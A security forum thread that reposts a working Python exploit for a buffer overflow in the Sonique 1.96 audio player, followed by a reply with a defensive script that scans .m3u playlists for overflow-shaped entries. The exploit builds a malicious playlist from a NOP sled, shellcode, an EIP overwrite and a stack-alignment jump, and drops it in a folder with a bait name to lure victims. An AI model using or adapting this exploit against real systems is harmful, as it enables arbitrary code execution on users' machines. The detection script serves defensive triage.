Author: DarK-Z [bridex]
Sonique is a free audio player. Sonique has a remote buffer overflow vulnerability when handling a malformed .m3u file; a remote attacker can exploit it to execute arbitrary code in the affected application or cause a denial of service.
Original poster, posted: 11-06-08 10:45
Reply: DarK-Z [bridex]
```python
# Application: Sonique BOF EIP Overwrite
# Version: 1.96
# Author: Securityxxxpert
# Date Submitted: May 17, 2011
# Download Link: http://www.tucows.com/preview/193562
# Tested on: Windows XP SP3
# EIP Overwritten: 239 Bytes
# Pita Bytes: 0x00 0x83 0x88 0x93
# Notes: Not universal, find your own offsets if not SP3 Eng
# Notes Cont: 4 Nops is added before aligning the stack in order to align the stack properly without errors
# Humor: Waterbottle + Justin Bieber's Head = Pwnage
# (Python 2 script: print statements, and the byte string is written through a plain "w" file object.)
import os

print "--------------------------------------------------------------------------------"
print " Sonique Player Exploit "
print " Retreat Hell! "
print "Greetz: Acidgen, Subinacls, GrumpyBear, Pyoor, Corelanc0d3r, Dr. Nick, Rek0n "
print "Greetz Cont: Connection, MaXe, ronin, Intern0t, "
print "Greetz Cont: Podjackel, g0tmi1k & The entire Corelan & Offensive Security Teams "
print "--------------------------------------------------------------------------------"

filename = "waterbottle.m3u"
nopsled = "\x90" * 93                        # Sliding to pwnage
sc = ("\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0")  # 16 byte Calc Shellcode
filler = "\x90" * 130                        # 93 + 16 + 130 = the 239 bytes up to the saved EIP
eip = '\x6F\x9C\x10\x5D'                     # 0x5D109C6F
alignjmp = '\x83\xC3\x1c\x90' + '\xff\xe3'   # Aligns the stack to EBX+1c, then Jumps to EBX *EBX+1C*
Junk = '\x42' * 10000

exploit = nopsled + sc + filler + eip + "\x90" * 4 + alignjmp + Junk

# Drop the playlist into a directory with a bait name.
os.makedirs("./Justin.Beiber -My World")
os.chdir("./Justin.Beiber -My World")
textfile = open(filename, "w")
textfile.write(exploit)
textfile.close()
```
Floor B1, posted: 11-06-08 10:47
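As an added example that is not part of the original thread, here is a defender-side triage script (Python 3) that flags .m3u playlist entries shaped like the malformed input described above. The 239-byte distance to the saved EIP is the figure from the post; the heuristics, the 0x90-run check and both sample playlists are constructed for this example.

```python
# Offset at which Sonique 1.96 overwrites EIP, taken from the post above.
EIP_OFFSET = 239


def m3u_entries(data: bytes):
    """Yield (line_number, entry) for every non-empty, non-comment M3U line."""
    for n, line in enumerate(data.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith(b"#"):
            continue
        yield n, stripped


def scan_m3u(data: bytes, max_len: int = EIP_OFFSET):
    """Return [(line_number, [reasons])] for entries that look malformed.

    Constructed heuristic: a legitimate M3U entry is a path or URL, contains no
    NUL or control bytes, and is well under max_len bytes.  Anything at or past
    the EIP offset, anything with control bytes, and any long run of 0x90 (a
    classic NOP-sled byte) is reported.  High-bit bytes alone are not flagged,
    because UTF-8 paths contain them legitimately.
    """
    findings = []
    for n, entry in m3u_entries(data):
        reasons = []
        if len(entry) >= max_len:
            reasons.append(f"length {len(entry)} >= {max_len}")
        if any(b < 0x20 and b != 0x09 for b in entry):
            reasons.append("control or NUL bytes")
        if b"\x90" * 8 in entry:
            reasons.append("NOP-sled-like run of 0x90")
        if reasons:
            findings.append((n, reasons))
    return findings


# Constructed samples: a normal playlist and one shaped like an overflow trigger.
BENIGN = (b"#EXTM3U\n#EXTINF:123,Artist - Title\n"
          b"C:\\Music\\track01.mp3\nhttp://example.invalid/stream.mp3\n")
SUSPECT = b"#EXTM3U\n" + b"\x90" * 64 + b"A" * 400 + b"\n"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, scan_m3u(sample) or "clean")
```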
|
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.